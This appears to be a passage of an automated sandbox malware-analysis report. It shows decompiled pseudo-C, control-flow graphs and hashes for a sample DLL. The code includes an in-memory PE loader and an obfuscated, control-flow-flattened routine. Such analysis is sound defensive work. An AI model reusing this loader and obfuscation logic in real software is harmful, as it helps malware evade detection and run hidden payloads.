                                                                                                                      • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                      • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                      • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 68e991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001990(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0xfffefe57
						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0xfffefe57
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_t59 = _v64 - 1; // 0x71
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001810(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0xfffefe57
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
															}
															if(E10001FF0(_v100, _v72) != 0) {
																_t202 = E10001CB0(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10001E30(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10055a88; // 0x0
																		_t278 =  *0x10055a84; // 0x1
																		_t326 =  *0x10055a80; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002840(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}





























                                                                                                                      0x10002286
                                                                                                                      0x10002289
                                                                                                                      0x10002290
                                                                                                                      0x100022a7
                                                                                                                      0x100022b3
                                                                                                                      0x100022c1
                                                                                                                      0x100022d8
                                                                                                                      0x100022f0
                                                                                                                      0x100022ff
                                                                                                                      0x10002302
                                                                                                                      0x1000230e
                                                                                                                      0x1000232f
                                                                                                                      0x1000234c
                                                                                                                      0x1000236e
                                                                                                                      0x10002377
                                                                                                                      0x1000237a
                                                                                                                      0x10002395
                                                                                                                      0x100023a8
                                                                                                                      0x100023c4
                                                                                                                      0x100023aa
                                                                                                                      0x100023b3
                                                                                                                      0x100023b3
                                                                                                                      0x100023cd
                                                                                                                      0x100023d2
                                                                                                                      0x100023d2
                                                                                                                      0x10002389
                                                                                                                      0x10002392
                                                                                                                      0x10002392
                                                                                                                      0x100023db
                                                                                                                      0x100023ea
                                                                                                                      0x100023f8
                                                                                                                      0x10002401
                                                                                                                      0x10002412
                                                                                                                      0x10002438
                                                                                                                      0x1000243e
                                                                                                                      0x10002445
                                                                                                                      0x10002472
                                                                                                                      0x10002483
                                                                                                                      0x1000248a
                                                                                                                      0x100024b2
                                                                                                                      0x100024c4
                                                                                                                      0x100024cb
                                                                                                                      0x100024d4
                                                                                                                      0x100024dd
                                                                                                                      0x100024e6
                                                                                                                      0x100024ef
                                                                                                                      0x100024f8
                                                                                                                      0x10002510
                                                                                                                      0x1000252e
                                                                                                                      0x10002534
                                                                                                                      0x10002546
                                                                                                                      0x10002554
                                                                                                                      0x1000255a
                                                                                                                      0x10002564
                                                                                                                      0x1000257a
                                                                                                                      0x10002581
                                                                                                                      0x10002598
                                                                                                                      0x1000259b
                                                                                                                      0x1000259e
                                                                                                                      0x100025bb
                                                                                                                      0x100025a0
                                                                                                                      0x100025b3
                                                                                                                      0x100025b3
                                                                                                                      0x100025d0
                                                                                                                      0x100025e3
                                                                                                                      0x100025ea
                                                                                                                      0x10002604
                                                                                                                      0x10002616
                                                                                                                      0x10002680
                                                                                                                      0x10002687
                                                                                                                      0x00000000
                                                                                                                      0x10002687
                                                                                                                      0x1000261f
                                                                                                                      0x10002678
                                                                                                                      0x1000267b
                                                                                                                      0x00000000
                                                                                                                      0x1000267b
                                                                                                                      0x1000262c
                                                                                                                      0x1000262f
                                                                                                                      0x10002635
                                                                                                                      0x1000263c
                                                                                                                      0x10002646
                                                                                                                      0x1000264d
                                                                                                                      0x10002661
                                                                                                                      0x00000000
                                                                                                                      0x10002661
                                                                                                                      0x10002654
                                                                                                                      0x1000268c
                                                                                                                      0x10002693
                                                                                                                      0x00000000
                                                                                                                      0x10002698
                                                                                                                      0x00000000
                                                                                                                      0x10002606
                                                                                                                      0x00000000
                                                                                                                      0x100025ec
                                                                                                                      0x00000000
                                                                                                                      0x100025d2
                                                                                                                      0x00000000
                                                                                                                      0x10002583
                                                                                                                      0x00000000
                                                                                                                      0x10002512
                                                                                                                      0x10002497
                                                                                                                      0x1000249f
                                                                                                                      0x00000000
                                                                                                                      0x100024a5
                                                                                                                      0x10002454
                                                                                                                      0x1000245a
                                                                                                                      0x10002461
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10002465
                                                                                                                      0x00000000
                                                                                                                      0x1000246b
                                                                                                                      0x10002419
                                                                                                                      0x00000000
                                                                                                                      0x1000241f
                                                                                                                      0x10002353
                                                                                                                      0x00000000
                                                                                                                      0x10002359
                                                                                                                      0x10002336
                                                                                                                      0x00000000
                                                                                                                      0x1000233c
                                                                                                                      0x10002315
                                                                                                                      0x00000000
                                                                                                                      0x1000231b
                                                                                                                      0x00000000
                                                                                                                      0x100022f2
                                                                                                                      0x100022c8
                                                                                                                      0x00000000
                                                                                                                      0x100022ce
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068F8FD Relevance: 11.6, Strings: 9, Instructions: 353COMMONCrypto
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 148 68f8fd-68fddc 149 68fde0-68fde6 148->149 150 68fdec-68fdf2 149->150 151 68ffa3-68ffbe call 684b61 149->151 152 68fdf8-68fdfe 150->152 153 68ffd1-68ffe9 call 68ab87 150->153 161 68ffc3-68ffc9 151->161 155 68ff5e-68ff64 152->155 156 68fe04-68fe0a 152->156 162 68ffee-68fff3 153->162 163 68ff99-68ff9e 155->163 164 68ff66-68ff6a 155->164 159 68ff49-68ff59 call 68f899 156->159 160 68fe10-68fe16 156->160 159->149 167 68fe18-68fe1e 160->167 168 68fe8f-68feae call 6946bb 160->168 161->149 169 68ffcf 161->169 171 68fff4-690000 162->171 163->149 165 68ff6c-68ff73 164->165 166 68ff91-68ff97 164->166 172 68ff81-68ff8a 165->172 166->163 166->164 167->161 174 68fe24-68fe5e call 69dcf7 call 68b23c 167->174 176 68feb3-68ff44 call 69da22 call 69dcf7 call 6847ce call 68a8b0 168->176 169->171 177 68ff8c-68ff8e 172->177 178 68ff75-68ff79 172->178 186 68fe63-68fe8a call 68a8b0 174->186 176->149 177->166 178->177 180 68ff7b-68ff7e 178->180 180->172 186->161
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E0068F8FD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed short* _t368;
				signed int _t381;
				signed int* _t383;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t405;
				signed int* _t438;
				void* _t439;
				signed short* _t445;
				signed int* _t446;

				_t446 =  &_v1700;
				_v1636 = 0x636551;
				_t2 =  &_v1636; // 0x636551
				_t385 = 0x5e;
				_v1636 =  *_t2 / _t385;
				_t383 = 0;
				_t386 = 0x7a;
				_t439 = 0x12dab9f;
				_v1636 = _v1636 * 0x55;
				_v1636 = _v1636 ^ 0x0059e0ec;
				_v1616 = 0x84ec4b;
				_v1616 = _v1616 + 0xffff958e;
				_v1616 = _v1616 << 6;
				_v1616 = _v1616 ^ 0x212f9cfc;
				_v1624 = 0x57c2af;
				_v1624 = _v1624 / _t386;
				_v1624 = _v1624 >> 0xa;
				_v1624 = _v1624 ^ 0x000a9340;
				_v1676 = 0x94d6a3;
				_v1676 = _v1676 >> 3;
				_t387 = 0x41;
				_v1676 = _v1676 * 0x79;
				_v1676 = _v1676 * 0x68;
				_v1676 = _v1676 ^ 0x9280c2f7;
				_v1644 = 0x578290;
				_v1644 = _v1644 | 0x80e552f7;
				_v1644 = _v1644 + 0xffffd80b;
				_v1644 = _v1644 ^ 0x80feae5e;
				_v1652 = 0x70c956;
				_v1652 = _v1652 ^ 0x31ba76f8;
				_v1652 = _v1652 ^ 0x87f2510e;
				_v1652 = _v1652 ^ 0xb63594c0;
				_v1696 = 0x39dcdb;
				_v1696 = _v1696 * 0x22;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 * 0x75;
				_v1696 = _v1696 ^ 0x000247c6;
				_v1572 = 0x793846;
				_v1572 = _v1572 + 0xfc60;
				_v1572 = _v1572 ^ 0x007fa213;
				_v1576 = 0x3629f6;
				_v1576 = _v1576 | 0x7f6cc17b;
				_v1576 = _v1576 ^ 0x7f7c74a2;
				_v1600 = 0x630dc0;
				_v1600 = _v1600 | 0x8a3170d6;
				_v1600 = _v1600 ^ 0x8a7fe201;
				_v1664 = 0xe79625;
				_v1664 = _v1664 * 0x57;
				_v1664 = _v1664 ^ 0xe47ae09a;
				_v1664 = _v1664 + 0xffff598f;
				_v1664 = _v1664 ^ 0xaac0e7d1;
				_v1648 = 0xac147c;
				_v1648 = _v1648 << 4;
				_v1648 = _v1648 / _t387;
				_v1648 = _v1648 ^ 0x00264750;
				_v1588 = 0x745952;
				_t98 =  &_v1588; // 0x745952
				_v1588 =  *_t98 * 0x3a;
				_v1588 = _v1588 ^ 0x1a53f4d8;
				_v1672 = 0x57a21b;
				_t388 = 0x49;
				_v1672 = _v1672 / _t388;
				_t389 = 0x63;
				_v1672 = _v1672 / _t389;
				_v1672 = _v1672 | 0xd6f4ed27;
				_v1672 = _v1672 ^ 0xd6feee0f;
				_v1620 = 0xc904e8;
				_t390 = 0x17;
				_v1620 = _v1620 * 0x6d;
				_v1620 = _v1620 + 0x178d;
				_v1620 = _v1620 ^ 0x5592dda0;
				_v1688 = 0x59d198;
				_v1688 = _v1688 | 0x5938a823;
				_v1688 = _v1688 ^ 0x788d0eee;
				_v1688 = _v1688 + 0xffff1978;
				_v1688 = _v1688 ^ 0x21fe2fab;
				_v1612 = 0xa097a2;
				_v1612 = _v1612 << 9;
				_v1612 = _v1612 / _t390;
				_v1612 = _v1612 ^ 0x02dc2d90;
				_v1700 = 0xb7b4a0;
				_t391 = 0x36;
				_v1700 = _v1700 / _t391;
				_v1700 = _v1700 >> 1;
				_v1700 = _v1700 | 0xee164e4b;
				_v1700 = _v1700 ^ 0xee1e6de5;
				_v1680 = 0xe4ad14;
				_v1680 = _v1680 | 0xe839ddc8;
				_v1680 = _v1680 ^ 0xfe881b96;
				_t392 = 0x42;
				_v1680 = _v1680 * 0x4e;
				_v1680 = _v1680 ^ 0xd7ed2c6e;
				_v1656 = 0xa710a4;
				_v1656 = _v1656 + 0xfffff8f1;
				_v1656 = _v1656 ^ 0xcc5b21c1;
				_v1656 = _v1656 ^ 0xccf98fb8;
				_v1628 = 0x5fc40d;
				_v1628 = _v1628 + 0xb682;
				_v1628 = _v1628 << 6;
				_v1628 = _v1628 ^ 0x181c8c04;
				_v1640 = 0xd7aa78;
				_v1640 = _v1640 + 0x8e1d;
				_v1640 = _v1640 / _t392;
				_v1640 = _v1640 ^ 0x0007a72a;
				_v1580 = 0xbf48f6;
				_t393 = 0x25;
				_v1580 = _v1580 * 0xd;
				_v1580 = _v1580 ^ 0x09b7b49e;
				_v1564 = 0xff195;
				_v1564 = _v1564 + 0x8c1b;
				_v1564 = _v1564 ^ 0x00104e06;
				_v1684 = 0xbf1e83;
				_v1684 = _v1684 / _t393;
				_t394 = 0x77;
				_v1684 = _v1684 / _t394;
				_v1684 = _v1684 + 0xa662;
				_v1684 = _v1684 ^ 0x0006fc0d;
				_v1596 = 0xc39bae;
				_v1596 = _v1596 << 2;
				_v1596 = _v1596 ^ 0x030cfbaf;
				_v1568 = 0x66568e;
				_v1568 = _v1568 | 0x44ac0d6e;
				_v1568 = _v1568 ^ 0x44e9cf2b;
				_v1692 = 0x3d2b27;
				_v1692 = _v1692 + 0x3fae;
				_t395 = 0x71;
				_v1692 = _v1692 / _t395;
				_v1692 = _v1692 + 0xffff1a11;
				_v1692 = _v1692 ^ 0xffffbf57;
				_v1632 = 0xb4dfda;
				_v1632 = _v1632 * 9;
				_v1632 = _v1632 >> 3;
				_v1632 = _v1632 ^ 0x00c4553b;
				_v1584 = 0x206e7a;
				_v1584 = _v1584 << 7;
				_v1584 = _v1584 ^ 0x10371375;
				_v1592 = 0x689459;
				_v1592 = _v1592 + 0xffffb773;
				_v1592 = _v1592 ^ 0x00637077;
				_v1660 = 0x8b14df;
				_v1660 = _v1660 << 0xd;
				_v1660 = _v1660 + 0x9803;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 ^ 0x71eeeb6f;
				_v1608 = 0x8e767e;
				_v1608 = _v1608 | 0xfaf7fbb6;
				_v1608 = _v1608 ^ 0xfaf9bdf5;
				_v1668 = 0xccd677;
				_v1668 = _v1668 * 0x78;
				_v1668 = _v1668 + 0xffff6b3d;
				_v1668 = _v1668 + 0xf0ff;
				_v1668 = _v1668 ^ 0x600a3b9e;
				_v1604 = 0x7c05f9;
				_v1604 = _v1604 + 0xd55a;
				_v1604 = _v1604 ^ 0x007aedaa;
				_t445 = _v1604;
				while(_t439 != 0x12dab9f) {
					if(_t439 == 0x2f8e73a) {
						_push(_v1604);
						_push(_t383);
						_push(_t395);
						_push(_t383);
						_push(_t383);
						_push(_v1668);
						_push(_t445);
						E0068AB87(_v1660, _v1608, __eflags);
						_t383 = 1;
						__eflags = 1;
						L23:
						return _t383;
					}
					if(_t439 == 0x92208ae) {
						_t368 = _t445;
						__eflags =  *_t445 - _t383;
						if(__eflags == 0) {
							L18:
							_t439 = 0xeef82b0;
							continue;
						} else {
							goto L11;
						}
						do {
							L11:
							__eflags =  *_t368 - 0x2c;
							if( *_t368 != 0x2c) {
								goto L17;
							}
							_t438 =  &_v1560;
							while(1) {
								_t368 =  &(_t368[1]);
								_t405 =  *_t368 & 0x0000ffff;
								__eflags = _t405;
								if(_t405 == 0) {
									break;
								}
								__eflags = _t405 - 0x20;
								if(_t405 == 0x20) {
									break;
								}
								 *_t438 = _t405;
								_t438 =  &(_t438[0]);
								__eflags = _t438;
							}
							_t395 = 0;
							__eflags = 0;
							 *_t438 = 0;
							L17:
							_t368 =  &(_t368[1]);
							__eflags =  *_t368 - _t383;
						} while (__eflags != 0);
						goto L18;
					}
					if(_t439 == 0x99a67ee) {
						_t445 = E0068F899(_t395);
						_t439 = 0x92208ae;
						continue;
					}
					if(_t439 == 0x9e65a83) {
						_push(_v1612);
						_push(_v1636);
						_push(_v1688);
						_push( &_v520); // executed
						E006946BB(_v1672, _v1620); // executed
						E0069DA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
						_push(_v1564);
						_push(_v1580);
						E006847CE( &_v520, _v1684, _v1640, _v1596, _v1568, E0069DCF7(_v1640, 0x681140, __eflags),  &_v1040, _v1692, _v1632);
						_t395 = _v1584;
						E0068A8B0(_t395, _t375, _v1592);
						_t446 = _t446 - 0xc + 0x58;
						_t439 = 0x2f8e73a;
						continue;
					}
					_t457 = _t439 - 0xeef82b0;
					if(_t439 == 0xeef82b0) {
						_push(_v1696);
						_push(_v1652);
						_t381 = E0068B23C(_v1572, _v1576, E0069DCF7(_v1644, 0x6810c0, _t457), _v1600, _v1664,  &_v1560); // executed
						_t395 = _v1648;
						asm("sbb edi, edi");
						_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
						E0068A8B0(_t395, _t379, _v1588);
						_t446 =  &(_t446[7]);
					}
					L20:
					if(_t439 != 0xdf158d7) {
						continue;
					}
					goto L23;
				}
				E00684B61( &_v1560, 0x208, _v1616, _v1624);
				_pop(_t395);
				_t439 = 0x99a67ee;
				goto L20;
			}




























































                                                                                                                      0x0068f8fd
                                                                                                                      0x0068f903
                                                                                                                      0x0068f90d
                                                                                                                      0x0068f917
                                                                                                                      0x0068f91c
                                                                                                                      0x0068f927
                                                                                                                      0x0068f929
                                                                                                                      0x0068f92c
                                                                                                                      0x0068f931
                                                                                                                      0x0068f935
                                                                                                                      0x0068f93d
                                                                                                                      0x0068f945
                                                                                                                      0x0068f94d
                                                                                                                      0x0068f952
                                                                                                                      0x0068f95a
                                                                                                                      0x0068f96a
                                                                                                                      0x0068f96e
                                                                                                                      0x0068f973
                                                                                                                      0x0068f97b
                                                                                                                      0x0068f983
                                                                                                                      0x0068f98d
                                                                                                                      0x0068f98e
                                                                                                                      0x0068f997
                                                                                                                      0x0068f99b
                                                                                                                      0x0068f9a3
                                                                                                                      0x0068f9ab
                                                                                                                      0x0068f9b3
                                                                                                                      0x0068f9bb
                                                                                                                      0x0068f9c3
                                                                                                                      0x0068f9cb
                                                                                                                      0x0068f9d3
                                                                                                                      0x0068f9db
                                                                                                                      0x0068f9e3
                                                                                                                      0x0068f9f0
                                                                                                                      0x0068f9f4
                                                                                                                      0x0068f9fe
                                                                                                                      0x0068fa02
                                                                                                                      0x0068fa0a
                                                                                                                      0x0068fa15
                                                                                                                      0x0068fa20
                                                                                                                      0x0068fa2b
                                                                                                                      0x0068fa36
                                                                                                                      0x0068fa41
                                                                                                                      0x0068fa4c
                                                                                                                      0x0068fa54
                                                                                                                      0x0068fa5c
                                                                                                                      0x0068fa64
                                                                                                                      0x0068fa71
                                                                                                                      0x0068fa75
                                                                                                                      0x0068fa7d
                                                                                                                      0x0068fa85
                                                                                                                      0x0068fa8d
                                                                                                                      0x0068fa95
                                                                                                                      0x0068faa0
                                                                                                                      0x0068faa4
                                                                                                                      0x0068faac
                                                                                                                      0x0068fab7
                                                                                                                      0x0068fabf
                                                                                                                      0x0068fac6
                                                                                                                      0x0068fad1
                                                                                                                      0x0068fae1
                                                                                                                      0x0068fae6
                                                                                                                      0x0068faf0
                                                                                                                      0x0068faf5
                                                                                                                      0x0068fafb
                                                                                                                      0x0068fb03
                                                                                                                      0x0068fb0b
                                                                                                                      0x0068fb18
                                                                                                                      0x0068fb1b
                                                                                                                      0x0068fb1f
                                                                                                                      0x0068fb27
                                                                                                                      0x0068fb2f
                                                                                                                      0x0068fb37
                                                                                                                      0x0068fb3f
                                                                                                                      0x0068fb47
                                                                                                                      0x0068fb4f
                                                                                                                      0x0068fb57
                                                                                                                      0x0068fb5f
                                                                                                                      0x0068fb6c
                                                                                                                      0x0068fb70
                                                                                                                      0x0068fb78
                                                                                                                      0x0068fb84
                                                                                                                      0x0068fb89
                                                                                                                      0x0068fb8f
                                                                                                                      0x0068fb93
                                                                                                                      0x0068fb9b
                                                                                                                      0x0068fba3
                                                                                                                      0x0068fbab
                                                                                                                      0x0068fbb3
                                                                                                                      0x0068fbc0
                                                                                                                      0x0068fbc3
                                                                                                                      0x0068fbc7
                                                                                                                      0x0068fbcf
                                                                                                                      0x0068fbd7
                                                                                                                      0x0068fbdf
                                                                                                                      0x0068fbe7
                                                                                                                      0x0068fbef
                                                                                                                      0x0068fbf7
                                                                                                                      0x0068fbff
                                                                                                                      0x0068fc04
                                                                                                                      0x0068fc0c
                                                                                                                      0x0068fc14
                                                                                                                      0x0068fc24
                                                                                                                      0x0068fc28
                                                                                                                      0x0068fc30
                                                                                                                      0x0068fc43
                                                                                                                      0x0068fc44
                                                                                                                      0x0068fc4b
                                                                                                                      0x0068fc56
                                                                                                                      0x0068fc61
                                                                                                                      0x0068fc6c
                                                                                                                      0x0068fc77
                                                                                                                      0x0068fc87
                                                                                                                      0x0068fc91
                                                                                                                      0x0068fc96
                                                                                                                      0x0068fc9c
                                                                                                                      0x0068fca4
                                                                                                                      0x0068fcac
                                                                                                                      0x0068fcb4
                                                                                                                      0x0068fcb9
                                                                                                                      0x0068fcc1
                                                                                                                      0x0068fccc
                                                                                                                      0x0068fcd7
                                                                                                                      0x0068fce2
                                                                                                                      0x0068fcea
                                                                                                                      0x0068fcf6
                                                                                                                      0x0068fcf9
                                                                                                                      0x0068fcfd
                                                                                                                      0x0068fd05
                                                                                                                      0x0068fd0d
                                                                                                                      0x0068fd1a
                                                                                                                      0x0068fd1e
                                                                                                                      0x0068fd23
                                                                                                                      0x0068fd2b
                                                                                                                      0x0068fd36
                                                                                                                      0x0068fd3e
                                                                                                                      0x0068fd49
                                                                                                                      0x0068fd51
                                                                                                                      0x0068fd59
                                                                                                                      0x0068fd61
                                                                                                                      0x0068fd69
                                                                                                                      0x0068fd6e
                                                                                                                      0x0068fd76
                                                                                                                      0x0068fd7b
                                                                                                                      0x0068fd83
                                                                                                                      0x0068fd8b
                                                                                                                      0x0068fd93
                                                                                                                      0x0068fd9b
                                                                                                                      0x0068fda8
